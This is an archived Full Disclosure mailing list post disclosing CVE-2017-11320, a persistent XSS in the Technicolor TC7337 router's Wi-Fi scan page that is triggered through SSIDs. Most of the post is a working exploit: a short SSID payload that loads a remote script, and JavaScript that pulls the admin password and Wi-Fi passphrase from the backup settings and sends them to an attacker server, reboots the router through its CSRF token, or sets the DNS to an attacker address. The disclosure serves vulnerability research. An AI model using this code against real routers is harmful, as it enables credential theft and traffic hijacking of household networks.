lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAD3GHqvcd6LAB9c6oh6Pi+kzdtS31+mcBPcECQOobtfq-n-S8A@mail.gmail.com>
Date: Wed, 2 Aug 2017 17:37:04 -0300
From: Geolado giolado <g3ol4d0@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2017-11320] Persistent XSS through the SSID of nearby
 Wi-Fi devices on Technicolor TC7337

// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script>   ( Exactly 32
bytes u_u )
//                             ^
//  5char domains are running  |    'src' does not requires quotes ,
and passing the URL with ony '//'
//  out, grab yours !          +---> it will cause the browser to make
the request with the current protocol,
//                                   which is HTTP , duh
// Below is the content of url.co/index.html
// index.html ( which is just a JavaScript actually, but we have to
use the index to fit the 32 chars ) :

function get_passwords(attackers_server) {
	// attackers_server = server to send the credentials
	// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	// XSS to get Admin's login/passwd + Wifi passphrase
	// from backup settings

	xmlhttp=new XMLHttpRequest();
	xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
	xmlhttp.send();
	var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's
Login and Password
	var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for
Wifi PassPhrase
	// Add a img requesting the attacker website with the leaked
passwords in the GET parameters
	document.write('<img src="'+attackers_server+'?net='+
encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
}

function reboot_router() {
	// XSS + CSRF reboot router
	// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	// Why? Because It's fun to watch a XSS doing 'physical' stuff

	xmlhttp=new XMLHttpRequest();
	xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of
the reset interface
	xmlhttp.send();
	var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
	var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes

	xmlhttp=new XMLHttpRequest();
	xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
// Request the reboot page with the CSRF token
	xmlhttp.send();
}

function dns_poisoning(attackers_dns) {
	// attackers_dns = malicious DNS Server
	// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit
my code is ugly as fuck , sorry world
	// Alter the DNS Config of the Router
	// changing the Primary and Secondary DNS to the attacker's one

	xmlhttp=new XMLHttpRequest();	
	xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
	xmlhttp.send();
	var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
	var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes
	var i_wanip = xmlhttp.responseText.indexOf("wanip") ;
	var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1]
;
	var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet") ;
	var wansubnet =
xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1]
;
	var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip") ;
	var wangatewayip =
xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1]
;

	xmlhttp=new XMLHttpRequest();
	xmlhttp.open("GET",
"/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey,
false);
	xmlhttp.send(); // Send the request to SAVE the Primary and Secondary
DNS with the CSRF Token

	//After saving we need to apply the settings. yeah, fuck logic --'

	//Getting a brand NEW SessionKey
	xmlhttp=new XMLHttpRequest();	
	xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
	xmlhttp.send();
	var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
	var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes

	xmlhttp=new XMLHttpRequest();	
	xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
// GET the apply DNS page
	xmlhttp.send();
}

//Choose your path !
//get_passwords("https://evil.domain/") ;
//reboot_router();
dns_poisoning("1.3.3.7")

// TimeLine
// ---------
// 08/07/2017 - First email sent to the vendor (no answer)
// 16/07/2017 - Second email sent to the vendor (no answer)
// 18/07/2017 - Third email sent to the vendor (no answer)
// 02/08/2017 - Full Disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ